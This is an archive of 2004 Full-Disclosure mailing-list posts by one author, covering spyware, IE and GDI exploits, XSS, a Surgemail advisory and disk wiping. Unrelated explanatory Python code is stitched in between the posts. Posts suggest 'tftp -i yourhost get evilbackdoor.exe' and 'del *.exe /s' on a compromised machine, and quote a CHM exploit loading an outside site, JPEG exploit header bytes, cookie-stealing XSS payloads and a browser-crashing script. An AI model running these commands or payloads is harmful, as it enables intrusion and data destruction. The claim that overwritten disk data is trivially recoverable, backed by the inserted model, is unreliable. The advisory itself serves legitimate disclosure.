 To say it another way, the Microsoft guy who created these files used a
 cracked version of the Sound Forge program.

 Even if it is probable the Redmond giant has a license of this program
 (400$), it looks bad to see this when we are hearing everywhere about the
 Microsoft anti-piracy policy...

 Laurent LEVIER
 Systems & Networks Security Expert, CISSP CISM

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
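The bintext hits in the post above (INFO at 0x56862, the ICRD date twelve bytes later, then the name and the software string) are the sub-chunks of a RIFF LIST/INFO block. The parser below is an added example, not code from the post or from any tool it mentions: it walks the chunk structure of a WAV file constructed inline and reports each metadata value with its byte offset, the way a strings tool would. The tag holding the "Deepz0ne" name is assumed to be IENG, since the bintext output does not show it.

```python
import struct

def _chunks(buf, pos, end):
    """Yield (chunk_offset, fourcc, payload) for each RIFF chunk in buf[pos:end]."""
    while pos + 8 <= end:
        fourcc = buf[pos:pos + 4]
        size, = struct.unpack_from("<I", buf, pos + 4)
        payload = buf[pos + 8:min(pos + 8 + size, end)]
        yield pos, fourcc, payload
        pos += 8 + size + (size & 1)     # payloads are padded to an even length

def riff_info(buf):
    """Return [(tag, value_offset, text)] for every LIST/INFO entry in a RIFF file.

    value_offset is the absolute byte offset of the text, i.e. what a strings
    tool such as bintext reports for it. Raises ValueError on non-RIFF input.
    """
    if len(buf) < 12 or buf[:4] != b"RIFF":
        raise ValueError("not a RIFF container")
    riff_size, = struct.unpack_from("<I", buf, 4)
    end = min(len(buf), 8 + riff_size)
    entries = []
    for list_pos, fourcc, payload in _chunks(buf, 12, end):
        if fourcc != b"LIST" or payload[:4] != b"INFO":
            continue
        # sub-chunks start after the 4-byte "INFO" list type
        for sub_pos, tag, text in _chunks(payload, 4, len(payload)):
            value_offset = list_pos + 8 + sub_pos + 8
            clean = text.split(b"\0", 1)[0].decode("latin-1")
            entries.append((tag.decode("ascii"), value_offset, clean))
    return entries

def riff_info_dict(buf):
    """Convenience view: {tag: text}."""
    return {tag: text for tag, _, text in riff_info(buf)}

def build_wav(info):
    """Build a minimal 8-bit mono PCM WAV carrying a LIST/INFO chunk (constructed test data)."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)
    samples = bytes(16)
    sub = b""
    for tag, text in info.items():
        value = text.encode("latin-1") + b"\0"
        sub += tag.encode("ascii") + struct.pack("<I", len(value)) + value
        sub += b"\0" * (len(value) & 1)          # word-align the next sub-chunk
    body = (b"WAVE"
            + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(samples)) + samples
            + b"LIST" + struct.pack("<I", 4 + len(sub)) + b"INFO" + sub)
    return b"RIFF" + struct.pack("<I", len(body)) + body

# Constructed sample mirroring the bintext hits in the post; the IENG tag is an assumption.
SAMPLE_WAV = build_wav({"ICRD": "2000-04-06", "IENG": "Deepz0ne", "ISFT": "Sound Forge 4.5"})

if __name__ == "__main__":
    for tag, off, text in riff_info(SAMPLE_WAV):
        print(f"{off:08X}  {tag}  {text}")
```

The offset gaps between ICRD, the name and ISFT in the constructed file come out to the same 0x14 and 0x12 bytes as in the bintext listing, which is how you confirm a strings hit really is a LIST/INFO block.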


Re: [Full-Disclosure] media-motor.net

2004-11-15 Thread morning_wood
file is a MSVB exe, here are some fun strings from the binary...
( spyware, but not a trojan )

http://www.maxmind.com:8010/a?l=PeAyF1sgrZYwi=\tempf.txt
\usta32.ini
http://mmm.media-motor.net/bundle.php?aff=\affbun.txt
  phases
  sewers
  outers
c:\asdf.txt
randomdll
mydll
randomocx
 \regsvr32 /s 
 randomexe
myexe
 SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  uinstaller
  unstall.exe
 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\media-motor
  DisplayName
  Media-motor
\unstall.exe
http://logs.media-motor.net/log3.php?c=what=newinstallaff=country=
 \tempf2.txt
what=dupinstallaff=

 anyone familiar with this group (media-motor.net/Roings.com) ? they
 seem to be sending downloader.trojan files to unsuspecting people
 using everyone.net webmail accounts.
 http://mmm.media-motor.net/soft/default.exe
 the webmail i discovered it on was from sunguru.com

 tries to download that file every time i log in or log out.?
probably using IE huh?

fun stuff,
m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MSIE IFRAME and FRAME tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))

2004-11-02 Thread morning_wood
bindshell success ( html run from local )
connect from remote success...
this is NASTY
if shellcode modified this will do reverse or exe drop i assume

good work,

Donnie Werner

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-10-30 Thread morning_wood
Obviously not many of you Americans ( which I am ) travel to Europe much, do you.

You fail to see, and therefore cannot comprehend, the attitude of many Europeans
about the attitudes of the American government ( f*cking with other parts of the
world ) for peace and freedom when it is about OIL. I am not anti-American...
merely observant.

can we kill this topic now? ( it's rather pointless )

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Slashdot: Gmail Accounts Vulnerable to XSS Exploit

2004-10-30 Thread morning_wood
there is a [x] box..

Don't ask for my password for 2 weeks.

this sets the user's cookie. Gmail uses the cookie for authentication.


XSS holes are not (as we all know) an immediate bypass for
 any authentication.
right

It can be used, with a bit of work, to steal
 cookies/authentication data from unexpecting users, NOT as an immediate
 break-into-accounts kiddie tool.
right

 However, the interesting thing I found about this article was this line:
 regardless of whether or not the password is subsequently changed

 Does Gmail use some sort of static security key?
 Does anyone have any further details on the security implemented by Google
 in their new service?
see above.


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal.

2004-10-08 Thread morning_wood
phood 4 th0ugh7,

last i heard being on the internet was voluntary...
( whether you are a person or business entity,
 and many successful businesses have no internet presence )
if i am correct... being on the internet is not mandatory to
conduct life sustaining activities...
( eat, shit, sleep [ pay bills to sustain the aforementioned activities ] )
and, correct me if i am wrong... i cannot harm you via the internet

hint: get off the internet and stop bitching
( and no, you cannot sue and litigate )


my 2 bits,

m.wood 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] XP Remote Desktop Remote Activation

2004-10-02 Thread morning_wood
 a malicious user who has already gained a command shell to activate

umm... you already own the box.
try... 
tftp -i yourhost get evilbackdoor.exe ( vnc maybe )

or

c:\del *.exe /s
c:\shutdown -r

I really do not see the SECURITY ISSUE here.


cheers,
m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...

2004-09-25 Thread morning_wood
umm, no
all this has that's different is correct headers for the bind or remote shell
option, and the ability to set ports and return ip in the code instead of needing to
use your own shellcode ( or metasploit's ). note: there is no new exploit code
or vector

--- / snip /-
new.
char header1[] =
\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64
\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00
\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65
\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19
\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26
\x2E\x3E\x35\x35\x35\x35\x35\x3E;
--- / snip /-
old.
--- / snip /-
char header1[]=
\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64
\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00
\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65
\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19
\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26
\x2E\x3E\x35\x35\x35\x35\x35\x3E;
--- / snip /-

take your media hype and die kthnx,
m.wood


 the last step before the worm

 http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Scandal: IT Security firm hires the author of Sasser worm

2004-09-22 Thread morning_wood
Ron, PLEASE STFU KTHNX ( you too Larry S. )

Who the f*ck cares, they hired him, if you don't like the company, don't
patronize them for business.
But please shutthefuckup. Why?
1. You have nothing to contribute.
2. you bitch and moan about things that are truly insignificant.
3. you are a Media Whore(s)
4. please see items 1-3

note: Item 4 is also applicable to Nick F. and Valdis K.

m.wood

 ahh, yes, but trust is a major component of this  business.  would you
 hire the person that sole all your valuables from your home to guard it
 for you?  would you really trust them if you were ignorant enough to do
 so?

 Thanks,

 Ron DuFresne

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] New GDI exploit

2004-09-22 Thread morning_wood
reverse successful...

m.wood

 Game over...
 
 So the exploit is out that will open a local command prompt on the
 machine exploiting the GDI library..
 
 This thing allows 2500 bytes of shellcode..
 
 How long before this turns nasty?
 
 Seems easy to me to make it reverse shell...
 
 
 
 
 The problem I have is patching with SMS. MBSA won't pickup the needed
 patched in SMS so you have to push out to all machines in a container
 for a certain software type-
 
 IE
 XP
 VIsio
 
 
 blah blah so on
 
 
 
 The cycle continues..
 
 JP
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Scandal: IT Security firm hires the author of Sasser worm

2004-09-20 Thread morning_wood
guess they shouldn't have publicized it. ( who cares )

@stake / Symantec - business is business, Symantec is acquiring not only
tools and expertise, but possibly more importantly a broader, richer client
base. ( again, who cares )

I do however find this interesting... the below suggests that a person and/or
persons affiliated with a TROJAN coding history ( and a bad one at that ) is
now ( or has been ) working with / for GFI.

look here:
http://s93625203.onlinehome.us/news.php

we will see you on sub7.net...
in the not so distant future,
 for new tools...
in the mean time visit www.forcedcontrol.com
and www.gfi.com for blades LanGuard

fc.com  ( trojan ddos kiddie :ed) and its crew have finished to move onto
other professional projects. bla bla

conclusion:
blade ( a former? virus / trojan coder ) works for and is / was a major
player for GFI.
and now ( blade / GFI ) is possibly recruiting other known viri / trojan
coders?

research:
http://www.google.com/search?hl=enie=UTF-8newwindow=1safe=offq=blade+Languardspell=1

www.come.to/soul4blade   GFI

http://www.google.com/search?q=soul4bladebtnG=Searchhl=enlr=ie=UTF-8newwindow=1safe=off

http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?ID=3282
Removal of the file and/or the registry entry will disable Blade Runner.
For further information on Blade Runner please see
http://www.come.to/soul4blade (link valid 29/03/00). 



nuff said,
m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers

2004-08-25 Thread morning_wood
password issues known to exist..

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability

or...
http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10
http://www.securityfocus.com/bid/3640/exploit/

To: [EMAIL PROTECTED]
Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)

try the contact page?
http://www.axis.com/corporate/contact.htm



err...

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] new email virus?

2004-08-25 Thread morning_wood
object  data=http://www.v%69k%6F%72d.com/default.htm;brbr

this is a data tag .chm exploit


[textarea id=code style=display:none;]
[object
data=#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/default.htm type=text/x-scriptlet][/object]
[/textarea]

[script language=javascript]

document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
tion.href.indexOf('default.htm';
[/script]


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers

2004-08-22 Thread morning_wood
password issues known to exist..

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+exploit

http://www.google.com/search?hl=enlr=ie=UTF-8newwindow=1safe=offq=axis+camera+vulnerability

or...
http://www2.corest.com/common/showdoc.php?idx=329idxseccion=10
http://www.securityfocus.com/bid/3640/exploit/

To: [EMAIL PROTECTED]
Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)

try the contact page?
http://www.axis.com/corporate/contact.htm



err...

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ws_ftp.log

2004-08-15 Thread morning_wood
you're serious??
this issue has been around for about 10 years...
try googling ws_ftp.ini, where you can simply drop the
ini in your ws_ftp folder, convert the hashes or import into your
favorite ftp client that supports the ws_ftp.ini style format.


m.wood

- Original Message - 
From: Gaurang Pandya [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, August 15, 2004 5:19 AM
Subject: [Full-Disclosure] ws_ftp.log


 Hi,
 
 WS_FTP is a popular & feature rich ftp client. It
 makes upload/download as easy as drag & drop. But
 mostly people using this forget that it creates a log
 file with the name ws_ftp.log. This file holds sensitive
 data such as file source/destination and file name,
 date/time of upload etc. People, when they use this to
 upload files to their website, never know that along
 with the other files the ws_ftp.log file also gets
 uploaded to the webserver, making it globally
 accessible.
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Automated SSH login attempts?

2004-07-30 Thread morning_wood
 wgte frauder.us/linux/ssh.tgz
http://frauder.us serves up putty.exe ( v 0.54 ) on connect
as frauder, no extension. Probably not your average admin
tool setup...

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] IE

2004-07-17 Thread morning_wood
i am curious if a regedit setting exists in order to alter the user agent of
the browser and to conceal info.

under windows...

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\User Agent\Post Platform

use anything... ( including javascript [hinthint] )


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: AW: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP

2004-07-13 Thread morning_wood
it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.

the same effect can be accomplished here...

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

-- snip --
Such memory protection systems aren't foolproof. Even for normal memory and
non-ActiveX controls, this script fragment will bring most browsers quickly
to their knees (don't try this unless you're willing to re-boot):

<HTML><BODY><SCRIPT>
var big_string = "double me up!";

while (true)
{
big_string = big_string + big_string;   // 20 iterations equals all your
memory...
}
</SCRIPT></BODY></HTML>

-- snip --

or not



m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Erasing a hard disk easily

2004-07-12 Thread morning_wood

 Since that time I have seen sensationalist TV shows showing how FBI and
CIA
 operatives get stuff out written to a sector BEFORE the sector was
 overwritten and I honestly cannot understand how that could be, if at all
 possible. Am I right in thinking those shows are bull?

simple...

by analyzing the magnetics of the disk
one write makes 010101 etc
the 0's and 1's are written to the disk by a magnetic manipulation of the
disk. there is a level of magnetism that can be measured, and
the disk electronics detect this difference.
let's say a 0 can be between .000 and .010 and a 1 is between .996 and
1.00

when you write again over the data, the magnetic properties of the disk
remember slightly the previous write.

now when you analyze the disk there is a ghosting of the previous data
example...
new data pits 0 =.009 1=.999
( ghost pits )  0=.003 1=.997

the drive electronics will detect the higher magnetic pits as actual data
and discard the data below the new threshold.

recovering the ghost data is now trivial by setting the thresholds below
the new data levels..
logic: discard any data over .004 for 0 and .996 for 1s


this is a very basic example of course but shows how this technique is used.


Donnie Werner

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
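The threshold argument above, carried through in an added toy model that is not the post's code and is not real drive physics: a fresh 0 reads about .003 and a fresh 1 about .997, residue from the previous write lifts those to .009 / .999, the drive decodes with the post's .000-.010 and .996-1.00 windows, and the ghost layer is read by tightening the cutoffs (.004 for zeros, .998 for ones; the second cutoff is a chosen midpoint, the post itself says .996). The single-layer residue and the exact level values are constructed assumptions.

```python
NOMINAL = {0: 0.003, 1: 0.997}   # level a bit settles at when the cell held the same bit
RESIDUE = {0: 0.006, 1: 0.002}   # extra level left behind when the cell previously held a 1

def write(bits, previous=None):
    """Analogue levels after writing `bits` over cells that held `previous` (fresh disk if None).

    Toy assumption: only the immediately preceding bit leaves residue.
    """
    if previous is None:
        previous = [0] * len(bits)
    return [NOMINAL[b] + RESIDUE[b] * p for b, p in zip(bits, previous)]

def drive_read(levels):
    """What the drive electronics report: 0 for [.000, .010], 1 for [.996, 1.00]."""
    out = []
    for lv in levels:
        if 0.0 <= lv <= 0.010:
            out.append(0)
        elif 0.996 <= lv <= 1.0:
            out.append(1)
        else:
            raise ValueError(f"unreadable level {lv:.3f}")
    return out

def recover_previous(levels):
    """Read the ghost layer by tightening the cutoffs below the new data levels."""
    out = []
    for bit, lv in zip(drive_read(levels), levels):
        cutoff = 0.004 if bit == 0 else 0.998
        out.append(1 if lv > cutoff else 0)
    return out

def overwrite_sequence(secret, passes):
    """Write `secret` to a fresh disk, then each pattern in `passes`; return the final levels."""
    levels = write(secret)
    previous = secret
    for pattern in passes:
        levels = write(pattern, previous)
        previous = pattern
    return levels

if __name__ == "__main__":
    secret = [1, 0, 1, 1, 0, 0, 1, 0]          # constructed sample data
    wiped = overwrite_sequence(secret, [[0] * 8])
    print("drive sees :", drive_read(wiped))
    print("ghost read :", recover_previous(wiped))
    twice = overwrite_sequence(secret, [[0] * 8, [1] * 8])
    print("after 2nd pass, ghost read:", recover_previous(twice))
```

In this model a single zero-fill still gives the secret back under the tightened cutoffs, while a second pass with a different pattern replaces the residue, which is the intuition behind multi-pass wiping; real media are messier than a one-layer model.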


Re: [Full-Disclosure] Re:

2004-06-23 Thread morning_wood
http://exploit.wox.org/babelpr0x.html
try babelfish?

m.wood

  http://exploit.wox.org/tools/googleproxy.html
 
 But with that (it is only the google translator), you aren't anonymous, 
 because the images and other files aren't translated, and they are loaded 
 directly from the server.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.

2004-06-16 Thread morning_wood
rofl, are you sure you're not Bipin ?


Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability
in all web servers.

 File Source disclosure vulnerability in all web servers.
 Remote exploitation of this issue can be achieved by clicking with the
 right button on the website and selecting the view source code option.
 This option will display the contents of the html code.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Surgemail - Multiple Vulnerabilities

2004-06-03 Thread morning_wood

   - EXPL-A-2004-002 exploitlabs.com Advisory 028 -

- Surgemail -



OVERVIEW

SurgeMail is a next generation Mail Server -
Combining features, performance and ease of
use into a single integrated product.
Ideal on Windows NT/2K, or Unix (Linux, Solaris etc)
 and supports all the standard protocols
IMAP, POP3, SMTP, SSL, ESMTP.

Surgemail suffers from two basic remote vulnerabilities...

1. Information Disclosure: by providing a non-existent filename, the STDERR
is rendered to the user, disclosing the physical directory structure.

2. XSS ( cross site scripting ) via the login form, and in particular
the username field. This allows for credential theft via externally
hosted malicious script. This affects both HTTP and HTTPS access vectors.



AFFECTED PRODUCTS
=
Surgemail ( Win32 and *nix through versions 1.9 )

WebMail v3.1d Copyright © NetWin Ltd

http://netwinsite.com/index.html
http://netwinsite.com/overviews.htm
http://netwinsite.com/server/email_server_software.htm


DETAILS
===
1. Information Disclosure
Surgemail's web based interface reveals the physical
directory structure when handling a non-existent
(404) request.


http://x.x.x.x/[non-existant request]

http://x.x.x.x:7080/scripts/
Could not create process D:\surgemail/scripts/ Access Denied
Is the url correct, check for a log file in the scripts directory
 and run the process in a shell window (D:\surgemail)

http://x.x.x.x:7080/scripts/err.txt
Could not create process D:\surgemail/scripts/err.txt File Not Found
Is the url correct, check for a log file in the scripts directory
 and run the process in a shell window (D:\surgemail)

http://x.x.x.x/scripts/err.txt
CGI did not respond correctly, it probably exited abnormally or the file
may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()



2. XSS ( cross site scripting )

 The login form username field is vulnerable to XSS

 snip 

http://x.x.x.x:7080/
http://x.x.x.x:7080/<script>alert('Vulnerable')</script>
http://x.x.x.x:7080/<script>alert(document.cookie)</script>

 snip 



SOLUTION

Vendor contacted May 16, 2003 [EMAIL PROTECTED]
Vendor acknowledgement received May 17, 2003

Vendor Patch / Version 2.0c released June 2, 2004
and may be obtained at
ftp://ftp.netwinsite.com/pub/surgemail/beta
http://www.netwinsite.com/surgemail/help/updates.htm


PROOF OF CONCEPT

( see DETAILS )


CREDITS
===
This vulnerability was discovered and researched by

Donnie Werner of exploitlabs
mail: [EMAIL PROTECTED]
--
web: http://exploitlabs.com
web: http://zone-h.org

ref: http://zone-h.org/en/advisories/read/id=4714/
ref: http://exploitlabs.com/files/advisories/EXPL-A-2004-002-surgmail.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
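Both issues in the advisory above, as an added example that is not NetWin's code: the CGI launcher error that echoed the install path beside a version that logs the detail server-side and returns a generic status, and the login form that reflected the username verbatim beside a version that HTML-escapes it. The install path, the form markup and the request handling are constructed stand-ins for the real product.

```python
import html
import logging

INSTALL_DIR = "D:\\surgemail"   # constructed stand-in for the path the advisory shows leaking
log = logging.getLogger("surgemail-demo")

def cgi_error_vulnerable(script):
    """Before: the launcher's STDERR text, install path included, goes to the client."""
    return (f"Could not create process {INSTALL_DIR}/scripts/{script} File Not Found\n"
            "Is the url correct, check for a log file in the scripts directory\n"
            f" and run the process in a shell window ({INSTALL_DIR})")

def cgi_error_fixed(script):
    """After: the detail is written to the server log; the client sees only a status line."""
    log.warning("CGI launch failed: %s/scripts/%s", INSTALL_DIR, script)
    return "404 Not Found"

LOGIN_FORM = ('<form method="post" action="/login">'
              '<input name="username" value="{user}">'
              '<input name="password" type="password"></form>')

def login_form_vulnerable(username):
    """Before: the submitted username is written straight back into the page."""
    return LOGIN_FORM.format(user=username)

def login_form_fixed(username):
    """After: escape <, >, &, and both quote characters so the value stays inside the attribute."""
    return LOGIN_FORM.format(user=html.escape(username, quote=True))

def leaks_install_path(body):
    """Check a response body for the physical install directory."""
    return INSTALL_DIR.lower() in body.lower()

def has_live_script(body):
    """Check a response body for an unescaped script tag."""
    return "<script" in body.lower()

POC = "<script>alert('Vulnerable')</script>"   # the advisory's own test string

if __name__ == "__main__":
    print(cgi_error_vulnerable("err.txt"))
    print(cgi_error_fixed("err.txt"))
    print(login_form_vulnerable(POC))
    print(login_form_fixed(POC))
```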


Re: [Full-Disclosure] Beware of 'IBM laptop order' email

2004-06-01 Thread morning_wood
http://www.f-secure.com/v-descs/wallon.shtml


 Last week on the site of 'The Register' an article was published about 
 spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not 
 release any information about the zero-day issue, so perhaps anyone on the 
 list knows anything about this issue and whether or not this issue is really 
 a zero-day vulnerability or just a old one,
 
 The article can be found at the following URL:
 http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Vendor casual towards vulnerability found in product

2004-05-26 Thread morning_wood
 I have the following queries

 1. Would an exploit like this be said to be severe?

yes

 2. Is the vendor right in their approach to this issue?

not entirely

 3. How do I make public the vulnerability? (Vendor has given permission for
 the same)

post it here, on your site, or another security list

 4. Ok, I'll rather ask... *should* I make public details of this
 vulnerability? (Since I know of sites using this app server, and they may be
 taken down if the exploit goes out)

yes, maybe the vendor will wake up


that said, it seems the vendor knows of the flaw, and it is easily remedied by the
aforementioned non-default setting and documentation reflecting that it is a good
thing to enable said option.
 Often a disclosure policy helps vendors stay on track

some disclosure policies can be found at..

http://oisafety.org/
http://oisafety.org/process.html

http://exploitlabs.com/disclosure-policy.html
http://www.cert.org/kb/vul_disclosure.html
http://www.atstake.com/research/policy/
http://www.hut.fi/~tianyuan/slides/template/template.html


Donnie Werner
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Microsoft Defaced ( again )

2004-05-24 Thread morning_wood
Zone-h.org reports..

A Portuguese group dubbed Outlaw group has defaced the Microsoft.com web
site, the hacked page (www.microsoft.com/mspress/uk/) isn't available anymore
since 9:00pm GMT

read more...
http://zone-h.org/en/news/read/id=4251/


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?

2004-05-21 Thread morning_wood
further testing...

c:\>type test1.pl
#test1.pl
$a="A" x 256; system($a);

http://[host]/test1.pl
[host - output ]
The instruction at 0x28073f63 referenced memory at 0x01c42ce0.
The memory could not be read

c:\>type test2.pl
#test2.pl
$a="A" x 261; system($a);

http://[host]/test2.pl
[host - output ]
The instruction at 0x28073f63 referenced memory at 0x42c42ce0.
The memory could not be read

Donnie Werner
http://exploitlabs.com


- Original Message -
From: Stephen Blass [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, May 20, 2004 2:15 PM
Subject: RE: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
ActivePerl ?


 Perl2Exe rolls the interpreter up into the exe so if the interpreter is
vulnerable, then the exe will be too.  With the service compiler you will have
the same situation in services compiled as 'standalone'; if you compile
'dependent' services you are at the mercy of the perl interpreter on the system
you deploy the service on.

 You can change the behavior of the perl 'system' in a perl script like so.

 use subs qw(system);
 sub system { my ($cmd) = @_; print "what, me run $cmd ? "; }
 $a = "A" x 256; system($a);

 You can reach out from your custom system subroutine to the real thing if
you'd like by calling CORE::system if you want to scrub arguments some more
before passing them to the system.

 -
 Steve Blass




 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] Behalf Of Clint
 Bodungen
 Sent: Thursday, May 20, 2004 12:44 PM
 To: morning_wood; 0day; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow
 in ActivePerl ?


 I haven't tested it yet but this also probably means that the msi/Microsoft
 service compilor in the Activeperl Developer's Kit is as well then.


 - Original Message -
 From: morning_wood [EMAIL PROTECTED]
 To: 0day [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Sent: Thursday, May 20, 2004 2:08 PM
 Subject: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
 ActivePerl ?


  binaries created via perl2exe also are affected.
 
  C:\>type 1.pl
  #
  $a="A" x 256; system($a);
 
  C:\>perl2exe -v 1.pl
  Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
  Cmd = -v 1.pl
  CWD = C:\
  Known platforms: Win32
  Target platform = Win32 5.006001
  $I =
  $ENV{'PERL5LIB'} =
  Found perl.exe at C:\Perl\bin
  LibList = C:\Perl\lib,C:\Perl\site\lib,.
  Converting '1.pl' to 1.exe
  Compiling 1.pl
 
  C:\>1.exe
  [BIG CRASH]
 
  C:\>
 
 
 
  Donnie Werner
  http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?

2004-05-20 Thread morning_wood
binaries created via perl2exe also are affected.

C:\>type 1.pl
#
$a="A" x 256; system($a);

C:\>perl2exe -v 1.pl
Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
Cmd = -v 1.pl
CWD = C:\
Known platforms: Win32
Target platform = Win32 5.006001
$I =
$ENV{'PERL5LIB'} =
Found perl.exe at C:\Perl\bin
LibList = C:\Perl\lib,C:\Perl\site\lib,.
Converting '1.pl' to 1.exe
Compiling 1.pl

C:\>1.exe
[BIG CRASH]

C:\>



Donnie Werner
http://exploitlabs.com
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ?

2004-05-18 Thread morning_wood
and we seem to get control of EIP.  Coincidence?  Try yet two more:
C:\>perl -e "$a='A' x 261; system($a)"


C:\>perl -V

Characteristics of this binary (from libperl):
  Compile-time options: MULTIPLICITY USE_ITHREADS PERL_IMPLICIT_
LICIT_SYS
  Locally applied patches:
ActivePerl Build 635
  Built under MSWin32
  Compiled at Feb  4 2003 15:34:21
  @INC:
C:/Perl/lib
C:/Perl/site/lib
.
C:\>

C:\>perl -e "$a='A' x 261; system($a)"
The input line is too long.

[CRASHES HERE]

C:\>


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Buffer Overflow in ActivePerl ?

